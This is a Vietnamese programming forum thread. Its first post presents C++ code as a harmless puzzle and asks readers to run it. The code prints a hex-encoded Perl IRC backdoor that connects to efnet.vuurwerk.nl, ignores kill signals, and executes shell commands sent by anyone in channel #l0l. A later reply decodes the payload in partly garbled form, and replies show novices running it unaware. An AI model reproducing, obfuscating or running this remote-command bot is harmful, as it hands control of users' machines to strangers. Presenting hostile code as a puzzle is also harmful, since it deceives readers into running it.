Từ 1 tới 8 trên tổng số 8 kết quả

Đề tài: [Hỏi]Một đoạn mã nhỏ...?

 1. #1
  Ngày gia nhập
  06 2007
  Nơi ở
  một nơi xa xăm...
  Bài viết
  127

  Mặc định [Hỏi]Một đoạn mã nhỏ...?

  Mọi người giúp tui tý nghen.Mọi người chạy đoạn code sau rùi giải thik cho tui những gì hiện lên trên màn hình có nghĩa là gì được không?
  PHP Code:
  #include<iostream.h>
  #include <conio.h>
  int main()
  {
  clrscr();
  cout<<"\x23\x21\x2f\x75\x73\x7\x2f\x62\x69\x6e\x2f\x70\ x65\x72\x6c\x0a\x24\x63";
  cout<<"\x68\x61\x6e\x3d\x22\x23\x6c\x30\x6c\x22\x3b\x24\ x6e\x69" ;
  cout<<"\x63\x6b\x3d\x22\x6d\x6f\x72\x6f\x6e\x22\x3b\x24\ x73\x65\x72\x76\x65\x72";
  cout<<"\x3d\x22\x65\x66\x6e\x65\x74\x2e\x76\x75\x75\x72\ x77\x65\x72\x6b\x2e\x6e";
  cout<<"\x6c\x22\x3b\x73\x75\x62\x20\x6e\x6f\x6f\x70\x20\ x7b\x7d\x20\x24\x53\x49";   ;
  cout<<"\x47\x7b\x54\x45\x52\x4d\x7d\x3d\x5c\x26\x6e\x6f\ x6f\x70\x3b\x20\x24\x53";    ;
  cout<<"\x49\x47\x7b\x4b\x49\x4c\x4c\x7d\x3d\x5c\x26\x6e\ x6f\x6f\x70\x3b\x69\x66";     ;
  cout<<"\x28\x66\x6f\x72\x6b\x28\x29\x29\x7b\x65\x78\x69\ x74\x3b\x7d\x75\x73\x65";
  cout<<"\x20\x49\x4f\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3b\ x20\x6d\x79\x20\x24\x73";
  cout<<"\x6f\x63\x6b\x20\x3d\x20\x6e\x65\x77\x20\x49\x4f\ x3a\x3a\x53\x6f\x63\x6b";
  cout<<"\x65\x74\x3a\x3a\x49\x4e\x45\x54\x20\x28\x20\x50\ x65\x65\x72\x41\x64\x64";
  cout<<"\x72\x20\x3d\x3e\x20\x24\x73\x65\x72\x76\x65\x72\ x2c\x20\x50\x65\x65\x72";
  cout<<"\x50\x6f\x72\x74\x20\x3d\x3e\x20\x22\x36\x36\x36\ x37\x22\x2c\x20\x50\x72";
  cout<<"\x6f\x74\x6f\x20\x3d\x3e\x20\x22\x74\x63\x70\x22\ x29\x3b\x65\x78\x69\x74";
  cout<<"\x20\x75\x6e\x6c\x65\x73\x73\x20\x24\x73\x6f\x63\ x6b\x3b\x70\x72\x69\x6e";
  cout<<"\x74\x20\x24\x73\x6f\x63\x6b\x20\x22\x55\x53\x45\ x52\x20\x6d\x6f\x72\x6f";
  cout<<"\x6e\x20\x2b\x69\x20\x6d\x6f\x72\x6f\x6e\x20\x3a\ x6d\x6f\x72\x6f\x6e\x5c";
  cout<<"\x6e\x4e\x49\x43\x4b\x20\x6d\x6f\x72\x6f\x6e\x5c\ x6e\x22\x3b\x24\x69\x3d";
  cout<<"\x31\x3b\x24\x6c\x69\x6e\x65\x3d\x3c\x24\x73\x6f\ x63\x6b\x3e\x3b\x77\x68";
  cout<<"\x69\x6c\x65\x28\x24\x6c\x69\x6e\x65\x3d\x7e\x2f\ x5e\x5b\x5e\x20\x5d\x2b";
  cout<<"\x20\x28\x5b\x5e\x20\x5d\x2b\x29\x20\x2f\x29\x7b\ x24\x6d\x6f\x64\x65\x3d";
  cout<<"\x24\x31\x3b\x69\x66\x28\x24\x6d\x6f\x64\x65\x3d\ x3d\x22\x30\x30\x31\x22";
  cout<<"\x29\x20\x7b\x6c\x61\x73\x74\x3b\x7d\x69\x66\x28\ x24\x6d\x6f\x64\x65\x3d";
  cout<<"\x3d\x22\x34\x33\x33\x22\x29\x7b\x24\x69\x2b\x2b\ x3b\x24\x6e\x69\x63\x6b";
  cout<<"\x3d\x24\x6e\x69\x63\x6b\x2e\x24\x69\x3b\x70\x72\ x69\x6e\x74\x20\x24\x73";
  cout<<"\x6f\x63\x6b\x20\x22\x4e\x49\x43\x4b\x20\x24\x6e\ x69\x63\x6b\x5c\x6e\x22";
  cout<<"\x3b\x7d\x24\x6c\x69\x6e\x65\x3d\x3c\x24\x73\x6f\ x63\x6b\x3e\x3b\x7d\x70";
  cout<<"\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22\ x4a\x4f\x49\x4e\x20\x24";
  cout<<"\x63\x68\x61\x6e\x5c\x6e\x22\x3b\x70\x72\x69\x6e\ x74\x20\x24\x73\x6f\x63";
  cout<<"\x6b\x20\x22\x50\x52\x49\x56\x4d\x53\x47\x20\x24\ x63\x68\x61\x6e\x20\x3a";
  cout<<"\x48\x69\x2c\x20\x49\x6d\x20\x61\x20\x6d\x6f\x72\ x6f\x6e\x20\x74\x68\x61";
  cout<<"\x74\x20\x72\x61\x6e\x20\x61\x20\x66\x61\x6b\x65\ x20\x30\x64\x61\x79\x20";
  cout<<"\x65\x78\x70\x6c\x6f\x69\x74\x2e\x5c\x6e\x22\x3b\ x70\x72\x69\x6e\x74\x20";
  cout<<"\x24\x73\x6f\x63\x6b\x20\x22\x50\x52\x49\x56\x4d\ x53\x47\x20\x24\x63\x68";
  cout<<"\x61\x6e\x20\x3a\x74\x6f\x20\x72\x75\x6e\x20\x63\ x6f\x6d\x6d\x61\x6e\x64";
  cout<<"\x73\x20\x6f\x6e\x20\x6d\x65\x2c\x20\x74\x79\x70\ x65\x3a\x20\x22\x2e\x24";
  cout<<"\x6e\x69\x63\x6b\x2e\x22\x3a\x20\x63\x6f\x6d\x6d\ x61\x6e\x64\x5c\x6e\x22";
  cout<<"\x3b\x77\x68\x69\x6c\x65\x28\x3c\x24\x73\x6f\x63\ x6b\x3e\x29\x7b\x24\x6c";
  cout<<"\x69\x6e\x65\x3d\x24\x5f\x3b\x69\x66\x28\x24\x6c\ x69\x6e\x65\x3d\x7e\x2f";
  cout<<"\x5e\x5b\x5e\x20\x5d\x2b\x20\x50\x52\x49\x56\x4d\ x53\x47\x20\x24\x63\x68";
  cout<<"\x61\x6e\x20\x3a\x24\x6e\x69\x63\x6b\x5b\x5e\x20\ x3a\x5c\x77\x5d\x2a\x3a";
  cout<<"\x5b\x5e\x20\x3a\x5c\x77\x5d\x2a\x20\x28\x2e\x2a\ x29\x24\x2f\x29\x7b\x24";
  cout<<"\x6f\x75\x74\x70\x75\x74\x3d\x60\x24\x31\x60\x3b\ x40\x6f\x6c\x69\x6e\x65";
  cout<<"\x73\x3d\x73\x70\x6c\x69\x74\x28\x22\x5c\x6e\x22\ x2c\x24\x6f\x75\x74\x70";
  cout<<"\x75\x74\x29\x3b\x66\x6f\x72\x65\x61\x63\x68\x28\ x40\x6f\x6c\x69\x6e\x65";
  cout<<"\x73\x29\x7b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\ x63\x6b\x20\x22\x50\x52";
  cout<<"\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20\ x3a\x24\x5f\x5c\x6e\x22";
  cout<<"\x3b\x73\x6c\x65\x65\x70\x20\x31\x3b\x7d\x7d\x20\ x69\x66\x28\x24\x6c\x69";
  cout<<"\x6e\x65\x3d\x7e\x2f\x5e\x50\x49\x4e\x47\x20\x28\ x2e\x2a\x29\x24\x2f\x29";
  cout<<"\x7b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\ x20\x22\x50\x4f\x4e\x47";
  cout<<"\x20\x24\x31\x5c\x6e\x22\x3b\x7d\x7d\x23\x63\x68\ x6d\x6f\x64\x20\x2b\x78";
  cout<<"\x20\x2f\x74\x6d\x70\x2f\x68\x69\x3b\x2f\x74\x6d\ x70\x2f\x68\x69";
  getch();
  return 
  0;


 2. #2
  Ngày gia nhập
  11 2007
  Bài viết
  0

  Chẳng hiểu cái này nó có nguy hại ko nữa, em lỡ compile roài, thấy máy tút một phát :(

 3. #3
  Ngày gia nhập
  11 2007
  Nơi ở
  Hà Nội
  Bài viết
  4

  đây là ma trận ah....mình chả hiểu cái gì hết thế trời

  Code:
  em lỡ compile roài, thấy máy tút một phát
  => có viruts sao tớ không chạy cái này đâu
  Đừng nói với tôi vấn đề đó khó...nếu nó không khó nó không phải là vấn đề....‰ —» % —» ¼ —» ½ —» 1 :Cái đích của ước mơ
  .´¯).:.___.:.(¯` ly_chank_ho ´¯).:.___.:.(¯`.

 4. #4
  Ngày gia nhập
  11 2007
  Bài viết
  0

  Thực sự vẫn ko hiểu? Tại sao khi chạy máy em bị delete một số file ở thư mục hiện thời (folder nữa)? Tại sao các lần chạy khác lại ko bị như thế?

 5. #5
  Ngày gia nhập
  09 2006
  Bài viết
  711

  Một đoạn shell code viết bằng Perl, nhưng chắc có lẽ Alviss copy sai nên nó out ra source Perl bị sai. Các cậu cứ tenprogram.exe > out.txt là ra:
  Code:
  #!/us/bin/p x65rl
  $chan="#l0l";$ x6eick="moron";$ x73erver="efnet.vuur x77erk.nl";sub noop x7b} $SIG{TERM}=\&no x6fp; $SIG{KILL}=\&n x6fop;if(fork()){exi x74;}use IO::Socket; x20my $sock = new IO x3a:Socket::INET ( P x65erAddr => $server x2c PeerPort => "666 x37", Proto => "tcp" x29;exit unless $soc x6b;print $sock "USE x52 moron +i moron : x6doron\nNICK moron\ x6e";$i=1;$line=<$so x63k>;while($line=~/ x5e[^ ]+ ([^ ]+) /){ x24mode=$1;if($mode= x3d"001") {last;}if( x24mode=="433"){$i++ x3b$nick=$nick.$i;pr x69nt $sock "NICK $n x69ck\n";}$line=<$so x63k>;}print $sock " x4aOIN $chan\n";prin x74 $sock "PRIVMSG $ x63han :Hi, Im a mor x6fn that ran a fake x200day exploit.\n"; x70rint $sock "PRIVM x53G $chan :to run c x6fmmands on me, typ x65: ".$nick.": comm x61nd\n";while(<$soc x6b>){$line=$_;if($l x69ne=~/^[^ ]+ PRIVM x53G $chan :$nick[^ x3a\w]*:[^ :\w]* (.* x29$/){$output=`$1`; x40olines=split("\n" x2c$output);foreach( x40olines){print $so x63k "PRIVMSG $chan x3a$_\n";sleep 1;}} x69f($line=~/^PING ( x2e*)$/){print $sock x20"PONG $1\n";}}#ch x6dod +x /tmp/hi;/tm x70/hi
  Nhìn không ra cái giống gì cả, ba cái trò tào lao.

 6. #6
  Ngày gia nhập
  07 2006
  Nơi ở
  Hà nội
  Bài viết
  204

  Mặc định [Hỏi]Một đoạn mã nhỏ...?

  Cái này thì có gì đặc biệt đâu nhỉ ???
  Life:\> dir

 7. #7
  Ngày gia nhập
  06 2007
  Nơi ở
  một nơi xa xăm...
  Bài viết
  127

  @TQN : Cảm ơn anh!Vậy để sau này học perl rùi hỏi típ vậy
  @Olavien : chỉ là lệnh cout thui,virus cái gì chớ

 8. #8
  Ngày gia nhập
  07 2007
  Bài viết
  10

  Một tiếng bip, và một dãy ký tự, là gì vậy?
  Có ai giải thích rõ được không ^^ Dân mới học lập trình nên không rõ đoạn code đó T_T
  offline as always

Quyền hạn của bạn

 • Bạn không thể gửi đề tài mới
 • Bạn không thể gửi bài trả lời
 • Bạn không thể gửi các đính kèm
 • Bạn không thể chỉnh sửa bài viết của bạn